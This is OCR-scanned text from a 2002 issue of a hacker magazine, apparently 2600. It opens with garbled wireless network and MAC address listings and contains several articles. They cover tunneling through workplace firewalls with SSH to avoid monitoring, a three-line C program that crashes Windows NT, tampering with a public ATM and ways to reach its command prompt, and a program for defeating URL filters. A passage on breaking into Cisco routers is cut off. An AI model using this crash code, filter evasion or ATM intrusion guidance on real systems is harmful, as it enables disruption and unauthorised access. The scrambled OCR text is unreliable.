X,){]O,6(;IHllH'.IJO:()�:::'IJ.()O:B(··X")'
<1l(l"id>.()Il:..).():')(dl:')�:7J
!l 01:o? ,:l� ;'>00;'>
IliWkf-b/<;eL
OJ; 91 I ". 0
01 13 I 04 3
O�; ; G I Ob' ?3b
07: 6 I 08: 1
09' , I 10· 12
11: 1 I 1)' 0
13: 0 I 14: 0
"Airport B,,�c [811 (hdllm,)' bs·,id OO:0?:)Il:H:5B:hl IolH' I
151 Oh)8..t�s
kllr/4768.00.()4:5A:F',):',)2:r2
<110 .,.,iJ>. DU:02:2D:27:rB:':iB
<n(1 �sid>. OO:")'O:lJli:1l4C:l)l-.
hay!.),1I0:40:lJl1:14:E..).:l)7
hnyI7.00AO:9flJ..).:56:JI
hay 14.OOA(J:lJfij4;J·UlF
<n(l",id>. IIO:EO:fllH2:CB:D4
<no "'id>.()O:20:EO.HB:D,.DH
!.llllllllaw.(JO:,)O:DI.OO:FB:2.1
<nil '>'>I1I>. OO:EO:6.1:50:2B:AA
Vilv�LAN Ncll''iork.OO:02:2D:2F:II:7C
J�I'aull.OO:-IO:05:1)1·::D5:.(·
XrcbaleVI.AN, 00:01 :�")':I:().2r:8H
{Wr�AP,OO:O(1:2."i::'i.lllJ·{'B
I-lilohilc&wireicss.(HI:")'0:96J7:71:()i
hayll.IIO>IO:%.I:{'4:1�.1
<no '>'>Id>. OO:FJi:6lS0:AE.CI:
hayI.OO:4I1:!J6J..).:BH:HS
<no ,,,d>.1I0:1I�:2[)J")':7D.25
'ppk Network .'l·a.1en.OO.02:2D:Jl':,lFH
<110 "lei>. ()0:40.lJ6:.11:B2Jf
<no "ld>. IJ():20.BJ:HB:OC:lJlJ
lillb,.,. U():O.tS:FD.BO: 1.1
iIlII.IJO:0'i:51):!·:A:IIX·."l(1
ILON.OO:51J:1H:OX:.l(·:(l�
J5 WIRIJ.I�SS, 00·1).t·."iA:F,j,:61:CS
Wird�". OO::,{I:AB:OH'9F:OI
dd�lldl. (1):."i0:IH:IlSXl:DH
linbv,. OII:{I·l:'jA:IJI�·7A:6A
blilldllli,IJlJ:-10:%·..O:I)(r41
(kf:llllr.O(I:!JO:4f·IIH:S7:F.6
<no sSld>. OI)·..O:9hJ1R1:74
R,·dWlr'. OO:III1:25:5R:21.1D
<no "I(b. OO:40:%3J:OR.D2
h,IYX. OO:..il:96J4:Il76
hayI,).00.40:96JJ06:.1()
<Ilri "Id>. U():")(j·1.)h:11:AI':1..
<111 ,sid>. OO:·lO:%:".'i:AA:BF
PIlNY.(){J:�():D,:01:7(':11
lmohilc. OO:-+tl:%JI:10:1."1
<no "ill>. OO:40:96:.'i7:fl(J:O.�
l,unami.OO:40:lJ(d 1:5·'56
<n(l.".id>. (JO:41l:lJ6:5H:O.'·47
NYC.Oll:511:SB:9():2B:7B
r·1ohikSlaL 00:40:96JI:10:211
<no ,wi>. (j!J:EO.l1lH!:CD:7')
IOI.OIl:50:DA:,)4:7H:5D
wlrl'le.I'.OOJO:;B.II.,B;()LJ
dl'lillllt.OO:SO:IX.()lJ:BA::"if>
lin�,»,, (){J:04:.'i;:FLD9:il7
Illl�'y'. O():04:.�A·I·h:11:')2
<111 >sid>.()()·..0·96:1�·("4:")")
link.,ys, {IO:04:5A:E!-.:OF:65
funw.OO·I).t·SA:("F·f'I):4H
WirL·Ie". 00'.10:,11:14·I1B:H.'
IlClaaknl. {10:04:S;:D2:4F:l,1
hlillillili.{)0:40:96.29:26.XS
<110 "id>. O(J..t():lJo:4X.!,l):IJL
h�lIIlkrafl.OO.1J6.2S::"i1IA:2·j
laliarl.00:40.%5A:BIJ:D(
YI()I.(I()JII:(1'i:O().5C:I1
IlIIk'I·,.1l0:0..J;S.-.OI::I-H-(·lJ
2600 Magazine
12. How to Break
Through a Proxy or
by unformed
There are different reasons for breaking
through firewalls/proxies. I) Get completely
unfiltered access to the Internet; 2) Get un
monitored, or secure, access to the Internet;
3) Access services normally disallowed by
the firewall.
This article will demonstrate various ways
to get by most implementations of fire
walls/proxies. In absolutely no way am I re
sponsible if you do anything you're not
supposed to (or even supposed to) be doing.
If you get caught and fired, tough shit. If you
access illegal information, tough shit. If you
open up a hole and somebody breaks into
your computer, tough shit. I'm not responsi
ble. (This is for the lawsuit-happy bastards
out there.)
Anyways, lets begin.
For all methods, it is expected that you
have access to a machine on the other side of
the firewall and that it has access to whatever
you need. Your machine will be the client and
the machine on the other side of the firewall
will be the tunnel. The accessed machine will
be the server.
Furthermore, this article also assumes you
have a basic knowledge of your browser's
configuration, installing software on your
client and tunnel machines, and logging in
via ssh.
A Linux/Unix box is preferable for the
tunnel, but not required by any means. The
software is freely available for any system.
HTTP Thnneling Through SSH
Often only some ports will be firewalled
(80,21,etc.) for caching, filtering, and moni
toring purposes. However, they leave direct
access available for other ports (25, 23,etc.).
If your browser must use a proxy to access
the web, but you don't require a proxy to get
mail, this is probably the implementation.
If you have direct access to non-popular
Page 12
ports, you can access almost any service as
long as you change the port. Generally, the
main purpose of bypassing this firewall is to
have unfiltered and/or unmonitored web ac
cess. The method can of course be modified
to meet your needs.
Install a proxy server (i.e., tinyproxy) on
the tunnel machine. For security purposes, set
the listening port to an odd port (i.e., 8999,
REMOTE_PROXY_PORT) or set access
rights to only localhost. Install an ssh (i.e.,
sshd) server on the tunnel. For security pur
poses, set the listening port to an odd port. Do
not set access rights to only localhost because
you'll access the proxy through ssh.
Install an ssh client on the client machine.
Select a random port (LOCAL_PORT) and
then set the browser's proxy to localhost:
LOCAL_PORT.
Run ssh with LOCAL_PORT forwarded to
REMOTE_HOST: REMOTE]ROXY]ORT.
(CLI ssh: ssh -L
IDCAL_PORT:REMOTE_HOST:RE
MOTE]ROXY_HOST -I USERNAME RE
MOTE_HOST)
Once connected and logged in, if the
proxy and the tunnel are working correctly,
you've got completely unfiltered web access.
(Using a SOCKS5 compliant proxy would
offer an almost completely unfiltered and un
monitored connection, as long as the applica
tion supported SOCKS proxies.)
SSH Thnneling Through HTTP
Some implementations allow only HTTP
access while blocking all other ports. Check
out Corkscrew at http://www.agroman.net
/cork-screw/
Corkscrew is a tool to allow full SSH ac
cess through a strict HTTPS session. Then
through the ssh access, you can create an
other tunnel to allow access to all other pro
grams.
2600 Magazine
13. Conclusion
Hopefully this allows some of the people
out there to worry a little less about getting
caught doing things they're not supposed to.
The reason for using ssh in both cases is be
cause it's encrypted. In the event you are
caught, at least you're only caught for break
ing the rules. There's nothing additionally in-
astv
by HJH
First off, l owe a major thanks to Zap
padoodle.com. Most of what follows is just
an easier to parse summary of what they've
already discovered.
Despite being quite bullish on Linux, I've
still considered the Windows NT line to be a
worthy competitor, especially Windows
2000. From what I'd read, and the little expe
rience I'd had, it seemed like a solid, depend
able, if somewhat bloated OS.
Then I read Zappadoodle.com.
That site described an odd little bug that
allowed anybody to bring that OS to its
knees. The entire demo consists of a measly
three lines of C code:
Summer 2002
criminating.
SSH can also be used for a lot more inter
esting things. Using Windows, you can instal
Cygwin, ssh into a *Nix box and tunnel over
X connections, and end up working as if you
were actually at the machine.
Anyways, that's my story, and I'm sticking
to it.
Buq
void mainO {
for (;;)
printf(" Hunguptbbbbbb" );
That loop prints a string to the console,
which means it passes through some code in
CSRSS.EXE. The output routine that hap
pens to parse it has a nasty flaw; it doesn't
properly handle several backspace characters
after a tab. Specifically, it backs up one char
acter too many, and doesn't make sure the
cursor position is still within the console
buffer. By repeatedly doing this, the cursor
position will eventually move outside the
memory area set aside for CSRSS.EXE. By
also writing normal characters, CSRSS.EXE
Page 13
14. will attempt to write there.
It won't succeed. The processor will
refuse CSRSS.EXE's attempts because it
doesn't have access to that bit of memory. NT
will follow up by killing off CSRSS.EXE. So
far, this is nothing more than poor bounds
checking and standard OS procedure.
Now things get interesting. See,
CSRSS.EXE is apparently a vital part of the
NT operating system. If the kernel notices
CSRSS.EXE isn't around, a kernel panic en
sues and everything halts; no buffers are
flushed, no more network requests are han
dled, and so on. Don't ask me why Microsoft
considers console access so critical.
Depending on the version of NT, the ma
chine may immediately reset or hang on a
blue screen. That's right, this bug affects
more than one version of NT. It's known to
be in Windows XP, 2000, and NT 4. It may
be in NT 3.5 and 3. 1 as well. Basically, if you
run NT, you have this bug.
I know what you're thinking; bounds
checking isn't that hard to fix, and we already
know where to find the relevant code, so Mi
crosoft probably has a patch out already.
Guess what? The bug has been public knowl
edge since late October of 200 I and as of
now, no patch is available. Microsoft hasn't
even admitted this bug exists.
Even worse, Microsoft is due to stop sup
porting NT 4 in a year or two and has already
abandoned NT 3.5 and 3. 1 . It's unlikely those
three will ever see a patch.
OK, if Microsoft isn't going to be any
help, an administrator will have to fill in.
Force anyone other than trusted admins into
a guest account. Prevent them from upload
ing and executing their own programs. From
now on, only a small set of programs are per
mitted. That should take care of it, right?
Nope.
Despite its importance to NT,
CSRSS.EXE handles all console output by
any user. Administrative privileges are
irrelevant.
And I said all console output. This means
Visual Basic programs can still down NT. As
can a Perl script. Or Python, TCL, QBASIC,
and even a few Java programs. The only ex
ceptions are programs that do more than just
spit data at the console. For instance, EDIT is
safe, but TYPE isn't.
In case you missed that, let me make it
clear: you can crash NT merely by printing
out a text file to a console. It sounds impossi
ble, but I've confirmed it on a WinXP box
with a 1 6MB text file.
While I could use this nasty bug to bash
Microsoft and sell Linux, I'm more con
cerned about all those vulnerable NT ma
chines. Maybe if we spread this info around
enough, we can get Microsoft to pay atten
tion and release a fix. It sure beats waiting for
a worm to exploit it, anyway.
Order through our online store at store.2600.com or send $20 (US $23 overseas)
to 2600, PO Box 752, Middle Island, NY 1 1 953 USA.
Page 14 2600 Magazine
15. by dufu
As I read 260(), I realize just how old I am - or
maybe just how young all the new experts and
pseudo-experts are. After all, my first computers
were a TRS-80 Modcl r and a Commodore 64.
Boy... programming was never so easy as back
then.
Every time I get a hold of the newest 2600, I
swear that I'm going to write in and comment on
how everyone seems to have gotten so much
smarter than me. After all, browsing MCIMail
with someone else's account was a big thing back
when I was a kid. Getting other's credit card num
bers has actually become easier although back
then, you could find a list of a hundred or more on
any given BBS. 64k') Wow. That would have taken
a few months of programming - even in basic - to
fill up. Who would ever need more than that? ! ?
Rcal time chatting? Some folks did it. But i t was
more like I RC - and [ could read at 300 baud so it
was easier. Networking? HOlm. Isn't that what they
used mainframes for? After all, the 286's weren't
even out yet. Color monitors came only in amber
or green for the most part unless you had a lot of
money.
I remember picking up two 1 2 meg hard drives
at a local computer flea market for free. The largest
hard drives on the market at the time were five
megs and r thought we had hit the jackpot. Until r
found out r couldn't get them to work on my
C64.... Boy. Tossing those 40 pound monsters into
the trash must have made the garbage men
happy.... .
Then came my first IBM - a real IBM. Weight
was twice as much as any clone. So was the elec
tric bill for using it if I remember correctly. Man. It
had multiple megabytes of drive space, semi-color
output - although not as good as the sprite driven
C64! It could go to the same BBS systems I used to
visit and fit more on the screen! Wow. Too bad I
couldn't read at 1 200 baud. Hacking SuperWilbr -
some school's remote word processing system or
something. Any old-timers actually know what it
was?
Someone came out with 2400 baud. Next com
puter flea market netted me a few 4800/9600
modems. Too bad they were nowhere near compat
ible with anything I used or owned. Their big blue
boxes looked just like the magnetic bone healers
the guy was selling in the booth next to mine. Oh,
did I mention I started getting a seller's booth at the
shows to make dropping off my find easier? Yeah,
I started sell ing junk from the last year's shows too.
Helped finance my l ife.
Doom, Doom n, Quake, and Heretic were all
Summer 2002
on a I ei-
got lucky a lot, saved a lot, or used the cheat
codes a lot. Regardless, r won.
Then came phone phreaking. I never really
took part. but [ playcd enough to build my own ad
vanced Rock Box (see 1 9: 1 , page 1 9) without the
aid of others. Loved to blast the random telemar
keter who called. Seems they call much more now.
I remember that 1 -800-424-9096 and 9098 were
the White House Press Line and the Department of
Defense hotline. One still works. You play to fig
ure out which. I memorized the touch tones so that
I could tell you what number or numbers you di
aled. That always freaked people out.
I'm drifting from the real purpose of this arti
cle. Let me jump back to the present time. I now
work for a large accounting firm that has recently
been taken down by the 001 because of the ac
tions of a few dozen peoplc. Their leadcr has plcad
guilty to the charges pressed against the firm that
fired him for the exact transgressions that got both
of them into trouble. We've lost more people and
more money than Enron even though they get most
of the press. I work with technology all day, every
day. Lucent digital phone systems that can be
crashed by playing too much. Networks that are
full of great information - all of which is now use
less. Drones - aka employees running around with
either W95 or W2K but nothing in-between. I even
remember my first week when I performed a basic
defrag on a PC and almost got fired for "hacking"
because they "caught" me doing it. They have
since become some of my best friends and beloved
coworkers. They come to me for technical advice
and guidance in many cases. I push the limits of
our in-house technical support folks' knowledge
base regularly enough that they have given �e the
direct number to their dedicated MicroScotf ad
vanced support center - along with the access code.
It's even more fun to stump those guys....
I could go on and on about how Lotus Notes
and eFax don't mix, W2K and our network keep
me from accessing sites, etc. However, it was sim
ply therapeutic to write this. What is the bottom
line, you ask? In a few years, you'
.
" be Just hke me
- wondering where all the newbles learned their
tricks and how they can possibly have enough free
time to use them all.
Keep hacking. Keep it moral. Teach others. Be
come a leader of the ignorant, not their enemy.
Page 15
16. g.-a b that cc3. C h�
by David Nicol
After reading all about "right-click protec
tion" and how it is supposed to work, I thought
I'd share the method I use to locate an image I
have seen recently on a web page when I want
to share it with someone.
Since all images are kept in Netscape's
cache, it is possible to create HTML pages that
refer to the images in the cache, and then work
with the images you want. I do this with a small
perl program something l ike:
#!/usrllocal/binlperl
open FILELIST, "find -I.netscape/cache -type
I";
mkdir "pages$$",0777
or die "could not make directory to put the
HTML pages in" ;
$Page = 'aa';
while « FILELIST>) {
Page 16
chomp;
print " adding $_ to
page$$I$Page.htmln" ;
open PAGE,
"»pages$$I$Page.html" or die $ ! ;
print PAGE "<img src=file:$_
height=40 width=40>n" ;
} ;
$. % IO or print PAGE "<br>nn" ;
$ . % I0 0 o r $Page++;
This gives you a bunch ofHTML pages each
with a hundred fi les from Netscape's cache on it
as images. When you find the image you want,
clean up with something like:
rm -rf pages 1 7 *
Below is a window-grab o f the result o f run
ning the above program on my Netscape cache.
2600 Magazine
17. T :U:E END OF AN ERA
by Lucky225
lucky225@2600.com
In the beginning, Ma Bell created the opera
tor center and the payphone. The first pay
phones were the old three-slot ones. When you
placed a long distance call from these phones,
an operator would ask for whatever the rate was
for the call and when you deposited th(: �qn�
you would hear bells or gongs, one bell for a
nickel, two for a dime, and a gong for a quarter.
This was an ineffective way of verifying how
many coins were being deposited and one could
easily deposit coins on a payphone next to them
or ring a little bell - the carliest form of rcdbox
i ng. When Ma Bell introduced the one-slot pay
phone it used a single frequency for identifying
coins that were deposited: 2200hz. One 66ms
beep was a nickel, two66ms beeps (66ms off)
was a dime, and five 33ms beeps (33ms off)
was a quarter. This was a good idea, but because
it only used a single frequency, a system like
ACTS could not be w idespread as talk-off prob
lems would register human voice and sound as
valid coin deposits. In the late 1 970s Automated
Coin Toll Service (ACTS) was introduced re
quiring new payphones that used DTMF coin
deposit signaling, with the famous DTMF (Dual
Tone Multi Frequency) 2200+ 1 700hz deposit
tone (same timing as the single frequency
2200hz). ACTS was supposed to be the latest
and greatest thing back then requiring less oper
ators for payphone customers and automating
payphone long distance calls. But it was a major
step backwards for AT&T. By the early 80's
phone phreaks with blue boxes that no longer
worked found another way to call long distance
by fooling the phone company with tones.
It's amazing that a service so susceptible to
fraud has survived thi s long, but it is now com
ing to an end. On May 2 1 , 200 1 AT&T filed an
application (NSD File No. W-P-D-497) with the
FCC to discontinue interstate sent-paid coin ser
vice (ACTS). On October 1 5, 200 I by public
notice (DA-O 1 -2375) the FCC granted AT&T's
request. The appl ication reports that its earnings
from the service are small and rapidly declin
ing, and that only a small amount of calls are
placed from phones where the service is pro
vided. Furthermore, they say that it costs mil
lions of dollars to provide the service each year,
an amount far greater than the revenues gener
ated. Also, the rates are ridiculous compared to
Summer 2002
what one would pay if he or she was using a
calling card or other
form of payment - a minimum of $4.65 of in
terstate long distance calls (a $ 1 .95 coin sur
charge fee plus $2.70 for each 3 minutes). The
$ 1 .95 is a one-time fee. However, the $2.70 is
the minimum you will be paying for each addi
tional three minutes. That's 90 cents a m inute,
rates that were possibly driven up by red box
fraud.
When you place a long distance call from
ACTS payphones, you will now get the follow
ing recording: "Your call will now be com
pleted. Please note, effective soon, this phone
will no longer accept coins for AT&T long dis
tance calls. You may wish to begin using a pre
paid calling card or other payment methods as a
substitute." You can hear this recording at
http://amatus.austin2600.org/-lucky2251red
boxatt.wav.
Once AT&T discontinues the service, that
will be the end of redboxing. AT&T is the only
carrier that offers sent-paid coin service. If you
try to use any 1 0 1 XXXX carrier, for example
MCl's 1 0- 1 0-222+ 1 +NUMBER, you will still
be routed to AT&T's automated system. I con
tacted Carmell Weathers of the FCC's Common
Carrier Bureau about this to try to find out if any
other carriers had offered to continue providing
sent-paid coin service, and here's what he had to
say:
Page 17
18. Date: Mon, 22 Apr 2002 1 7:40:08 -0400
From: Cannell Weathers <cweather@fi·c.gov>
To: luck'225@2600. COM
Suhject:
"
Re: AT& T Coin Sent Paid Service
Dis('0/1tinlwlion
Luckv225,
S()Jll�; the FCC "has /lol " granted Ar& 1"s
request to discontinue service.
Privileged & Confidential
I'm not sure what he meant by this as they
have already granted AT&T's request by public
notice. Perhaps it's still in transition and AT&T is
IATMs-by Acidus
Acidus@resnet.gatech.edu
So I was out at a mall and I needed some
cash and I walked up to an ATM at Lenox Mall.
It was a PNC Bank ATM, and I couldn't help but
wonder why a bank from Pittsburgh had ATMs
in a mall in Georgia. Anyway, something was
wrong with it, and it appeared that a repairman
must have been working on it because the
screen showed some kind of configuration pro
gram. It looked a lot like the B IOS config screen
on any Pc.
The screen had something like eight options,
things like change system time, change system
data, change drive settings, print config, and re
booL These options were printed along the sides
of the screen next to the buttons. I pushed the
button next to "print config" (or something like
that), and instead of taking me to a screen to
configure the thermal printer. the ATM hummed
for a second, and out of the receipt printer came
a printout of the current configuration of the
machine. Here is the printout word for word:
PNC B A N K
* * * * * 0 1 /0 1 /07 1 2 : 1 <) : 1 <) * * * * *
S ETUP
D AT E ( Y Y/M M/D D ) 0710 1 10 1
T I M E ( H H : M M : S S ) 1 2 : 1 <) : 20
FLEX D R I V E A 1 .44 M B
FLEX D R I V E B N O N E
DR I V E I T Y P E 1 27
D R I V E 2 T Y PE N O N E
TOTAL M EM O RY ( K B ) 1 6000
COPROC E S S O R Y E S
Page 18
going to be forced to continue providing the ser
vice. Doubtful though. Red boxing will soon be
come history though. Even with AT&T's
discontinuation the local phone company does
provide ACTS for intraLATA calls, but I'm sure
the payphones will start being replaced with Nor
tel Millenniums and COCOTs in the near future.
So keep your eye out and if you haven't done any
experimenting with ACTS payphones, now's
probably your last chance. Note however that
Canada still uses single frequency 2200hz pay
phones, but those are slowly being phased out too.
Other than the "Flex" thing, this looked just
like the specs of a simple computer. I didn't
want to change the date or anything, and I
couldn't do much at this screen. I knew I didn't
have much time, and the "reboot" option looked
really good. So I hit it and the machine went
blank. And nothing happened. Then it whirled
to life, and in the top left counter I saw num
bers: 4096, 8 1 92, all the way up to 1 6000. Hello
post' Then what should my wondrous eyes sec
but "Phoenix BIOS Ver 4.something or other. "
The machine then did some kind of check on its
Flex drives and then a big IBM logo came up. I n
the bottom on the screen it said " IBM OS/2 Ver
sion 3. Government" There was something after
"Government," but the screen was smeared with
something so god awful, I sure as hell wasn't
going to touch iL The screen cleared and then
the words "Load 40" came up, at which point
the screen went to 40 columns. At this point I
started attracting serious attention and decided I
should go. As I left I saw the machine default
into the setup program again.
I had always thought ATMs had specialized
hardware and crazy stuff like that, not a PC run
ning OS/2 of all things. The more I researched
the weirder it was. ATMs are quite a complex
blend of software and hardware, and a compre
hensive study of them is beyond the scope of
this article. However, information on ATMs and
their specifics is (for obvious reasons) very hard
to come by. This should clear some of the mys
tery up.
Hardware
The standard computer equipment available
on an NCR ATM is: a Pentium processor
(speeds from 100 to 1 66), RAM ( 1 6MB to
32MB), a 1 .2 gig IDE hard drive, one 1 .44MB
flex drive (it's just a floppy), a 10 inch VGA
2600 Magazine
19. color or monochrome monitor (notice VGA, not
SVGA, so it's only doing 320x200x256), and
RS-232 port. Optional parts include a sound
card (to play digitized speech), an IDE
CDROM to store the speech (speeds range from
6x to 24x), a second Flex drive, and other bank
ing specific hardware (a better thermal printer
for receipts, currency cassettes, etc.).
I found the RS-232 interface a great thing to
hack. It i s there to allow remote video card sys
tems to be controlled by the ATM. However,
thi s is a rarely used option. RS-232 is extremely
well documented but sadly slow. On the other
hand, ATMs have really weird connectivity. The
NCR ATMs I researched (Personas and 5xxx se
ries) didn't support TCP/IP. They had weird pro
tocols like NCR/ISO Async, IBM 3275 Bisync,
and a lot of other very obscure stuff. RS-232 i s
the only guaranteed way to move lots o f data on
and off the system.
There is a lot of banking specific hardware
in these things. I don't want to fill this article
with specs of currency cassettes or mag card
canisters. If you are i nterested, check my refer
ences. The only thing of interest is a DES Hard
ware encryption system.
Software
The operating system running on the ATMs
is OS/2 Version 3. (I have since seen versions of
OS/2 Warp for sale for ATMs as well.) T know
next to nothing about OS/2, so study on your
own if you want. I do know however that OS/2
is used for its multitasking abilities.
The main NCR programming running is
something called the Self Service System Soft
ware (S4). This keeps a log on the hard drive of
"all significant customer and supervisor activ
ity." It also manages all the appl ications such as
the communications software and the graphical
display. S4 has an API programmers can use
called ADI. ADI handles things like memory al
location and access to the file system. However,
programmers can call OS/2's API directly.
These machines use FAT as their file system
and, since it's IBM, it is most likely still FAT l 6.
Other software running on these ATMs i s NCR
Direct Connect, which seems to be the interface
to the communications. (It handles the proto
cols, and can convert between them or emulate
other ATMs.)
The software running on the ATMs could be
pretty old. T mean, the diagnostics asked it I had
a coprocessor to enable. Math coprocessors
have been standard inside processors since
386DXs and 486DXs. Also, NCR otters a book
for Pascal programmers to develop applications
for the ATM.
ATM software is devcloped on standard
PCs, and since they use Intel x86 Pentium class
Summer 2002
processors with a standard DOS based operat
ing system, anything that doesn't use Windows
API calls should work. In fact, a lot of Windows
3.x programs work in OS/2. A good rule of
thumb: if it works in DOS, it will work in OS/2.
Communication
Communication in the ATM is conducted
through leased lines, though some ATMs in less
high traffic areas may still use dial-up. By Fed
eral law all information traveling on these lines
must be encrypted. The NCR ATMs uses DES.
Alarms
Alarms on the ATM mainly protect against a
physical attack. These are the mechanical and
thermal alarms, and they make sure you don't
take a crowbar or a blowtorch to the money
door. However, NCR does have an enhanced
alarm system which protects the Flex disk drive
door. This enhanced version also has seismic
sensors. However, unplugging the ATM or re
booting it a lot shouldn't mess anything up.
Conclusions
There is a lot more i nfo about ATMs and you
can check my references. I have no desire to try
and steal money from them so I never really
looked at the data lines or ways to intercept key
presses inside the machine. However, my re
search shows that the computer part of the
ATM, since it uses standard PC parts, is vulner
able. I rcbooted it for god's sake. I wish I knew
the OS/2 equivalent of [F5] which would have
let me interrupt the boot and get to a command
prompt. The machines most hackable are in
malls and other public places. These have much
less armor plating and other countermeasures
and instead rely on their exposure to protect
them. If you look like you know what you are
doing, no one will question you.. Who would
like to put anti-virus software on an ATM? With
a little research about OS/2 and how it loads,
you could easily drop out of the boot-up and get
to a command prompt. Using the floppy and the
RS-232 port (or better yet a CDROM if it's
there), you could install your own software.
How cool would it be to have an ATM running
Doom?
References
NCR PersonaS 88 ATM System Description
- Got the bulk of my info from this. Found it af
ter a ton of searching on a cached Google page
of NCR's Russian web site. I don't think they
wanted this out in the public, but I got it and
moved it to my site: http://www.prism.gat
ech.edu/-gtc344p/NCR-ATM.pdf
The Bankers Exchange - They sell ATM
parts and accessories. Used them to check on
parts: http://www.bankersx.comlhome.html
The idiots at Lenox - for leaving the ATM in
diagnostic mode.
Page 19
20. The Afghan Ph,�D,
l:�' / 1
by Iconoclast
phosgene @ setec.org
If you are a curious phreak like me, the
telecommunications infrastructure of Afghanistan
immediately comes to mind as something that de
serves exploration and understanding. Alas, the
lack of said infrastructure leads me to say that it is
quite possibly the worst place to try to make a
phone call from on the entire planet.
We take our precious lovely dialtone for
granted, but there you will be hard-pressed to
even find a working telephone. To begin with,
let's take a look at the numbering formats for the
country. Country codes are assigned by the Inter
national Telecommunications Union (lTU)
(www.itu.int). The International Country Code
(ICC) for Afghanistan is 93. The "9" signifies it is
in geographical region 9 of the world. The United
States has an ICC of 1 .
From within Afghanistan, to place an interna
tional call you would dial the International Direct
Dial ODD) code which is 00. To place a call
within the country you would prefix it with the
National Direct Dial (NDD) code which is simply
O. There are no city codes or area codes in the
country on the old electromechanical exchanges.
Numbers within the various cities are five digits
long. An excellent directory of people to call in
Afghanistan was listed by the Afghan Wireless
Communications Company (AWCC) but was re
cently removed. Hopefully, they will restore this
information (www.afghanw ireless.com/search.
cfm).
Telephone usage is actually dropping, since in
1996 there were 29,000 lines available and in
1998 there were only 2 1 ,000 lines. Of course,
Taliban bans on Internet use didn't exactly spur
telecom growth. My sources in the CIA have
stated that "in 1997, telecommunications links
were established between Mazar-e Sharif, Herat,
Kandahar, lalalabad, and Kabul through satellite
and microwave systems" (www.cia.gov/cia/pub
lications/factbooklindex.html).
Two telecommunications companies from
China, Zhongxing Telecom and Huawei Tech
nologies, were attempting to install a switching
network in the capital city of Kabul which could
handle 1 30,000 lines. The status of this project is
unknown at the current time.
Most of the existing exchanges are based on
electromechanical switches that are 40 years old.
These old exchanges are using Siemens Strowger
switches. Completing cal ls on these exchanges is
very difficult. New equipment using digital
Page 20
switches i'tS peintlnstlillcd. In order to place calls
to the older swi¢lies, one the operator
service in Kab� complet "W f� �ou. You
can reach the opef'atbr service oy dialing +93-2-
290090, Then give them a five digit phone num
ber and the call may have a slight chance of being
completed,
Parts of the country have digital exchanges
which can be dialed directly without the operator.
The various city codes are: 02 Kabul, 03 Kanda
har, 04 Herat, 05 Mazar-i-Sherif, 06 Kunduz, 07
lalalabad, and 08 AWCC Mobile Telephone Net
work,
Regarding international telecommunications
links, this is primarily done through satellite com
munications. A company called Telephone Sys
tems International S.A. (www.telsysint.com)
provides international connectivity. According to
Afghan Wireless, there are satellite earth stations
- one Intelsat (Indian Ocean) linked only to Iran
and one Intersputnik (Atlantic Ocean region), as
well as a commercial satellite telephone center in
Ghazni.
This New York City based company unveiled
a brand new GSM phone network in Afghanistan
in May, 2002. Chairman Hamid Karzai was the
first person to place a telephone call over it. This
has actually been the fastest GSM installation in a
developing country.
There are two different kinds of phone cards
planned for sale. One is called a "Fixed Line
Phone Card," the other is a "Mobile Top Up." To
use the Fixed Line Phone Card, one would dial 81
from within the country, l isten to the instructions,
and then enter the PIN as printed on the back of
the card. The destination party number is then di
aled. If a mistake in dialing is made or one wants
to make an additional call, then "##" is entered
foll<?Wed bytM lYUmber. The'Mobite TOp'Upjeard
add$ fundt�,it:GSM account. The number 1 V1 is
dialj:d froNtWft'hin the country, the PIN i$ enlered
as printe� on th,e back of tjle acdpunt
is autom�tle§tfy credited�, ,�2f" '
CPf course; by ;now yol,1
"reach Wl..and touch
Afg�antstari�Why not give
an (NMARSAT satellite
has lW! peel}cpicking up
".... ."
. der why?!). Bin
a,1 +873-682-�05-331: Have ph�n !
2600 Magazine
21. ¥7!3r-AkOr-A7!3� If/tU( r-o
Defeat U RL Fi lte rs
by ThermoFish (JW)
In 1 7:3, the article entitled "Another Way to De
feat URL Filters" by ASM_dood put it up to readers to
come up with a script to tum IP addresses into their
decimal equivalent. At the end of the article a script by
CSS was put in which did just that. While that script
works great, most people know the hostname (URL)
of the site they want to go to. Who wants to have to go
get the IP address of the hostname they want to go to?
Instead of the two step process of getting the IP ad
dress of the hostname and then turning that IP into a
r����u�.�����'-" .,-�>,'>
!#include <stdio.h>
I#include <stdlib.h>
I#include <string.h>
I#include <iostream>
j#include <winsock.h>
!#include <conio.h>
I . .
l mt IPtoDec (char *lp);
lint maino
I I
! using namespace std;
! WSAData wData;
;
decimal, I would ratherjust type in a hostname and get
its decimal equivalent in one step. Therefore, I wrote
some code to accomplish that.
This code was written in YC++ and you need to
include the WSOCK32.LIB library in the workspace
for it to link properly. I left the IP to Decimal function
separate to show how that is done more clearly. The
retrieval of the IP from the hostname is done with the
HOSTENT structure and GETHOSTBYNAMEO
function.
if (WSAStartup(MAKEWORD(2,2), &wData) == SOCKET_ERROR)
{
}
cout « "Winsock init errorn" ;
cout « "nnPress any key t o exit.n" ;
getchO;
return 1 ;
hostent * h = NULL;
char hostname[80] ;
cout « "nn"
« "########################################n"
« "# Host Name to Decimal Equivalent v l .O #n"
« "# by: ThermoFish (JW) #n"
« "########################################nn" ;
cout « "Enter hostname: " ;
c i n » hostname;
h = gethostbyname(hostname);
if (h == NULL)
{
}
cout « "Could not resolve " « hostname « endl;
cout « "nnPress any key to exit.n";
getchO;
return 1 ;
char *ip = ineCntoa(*(reinterpret_cast<in_addr*>(h->h_addr)));
cout « "nIP address : " « ip « endl;
I PtoDec(ip);
cout « "nnPress any key to exit.n";
Summer 2002 Page 21
22. using namespace std;
char *cptr = strtok (ip, ". ");
int shift = 24;
unsigned long ace = OL;
while (cptr != NULL)
{
acc += atol(cptr) « shift;
shift -= 8 ;
cptr = strtok (NULL, ".");
cout « "nIP as Decimal : " « acc «
}
return (0);
by Grandmaster Plague
Cisco routers are some of the most fascinating
machines on the Internet. It is almost assured that
if you send a packet to a random machine on the
Internet, your packet will pass through a Cisco
router. The prevalence of these beauties on the net
is mind boggling. But how do you break in? Well,
this requ ires a little explaining first.
Standard Disclaimer: The information in this
article is meant foreducational purposes only. I do
not advocate doing anything mentioned in this ar
ticle. I also take no responsibility if you do any
thing mentioned in this article.
Some Background Info First
Cisco routers are great at passing packets from
network to network. However, they are shitty at
directly receiving packets sent at them. If they
could receive packets as well as they could route
them, then Cisco would sell an all-in-one super
duper Internet server-router gee-whiz-it-does
everything machine. Keep this in mind for the
attack that will come later. Now, if you try to tel
net to a properly configured Cisco router you will
get one of two things. The first is that your con
nection will be denied (or will time out) based on
a firewall ruleset, or because tcplip access is not
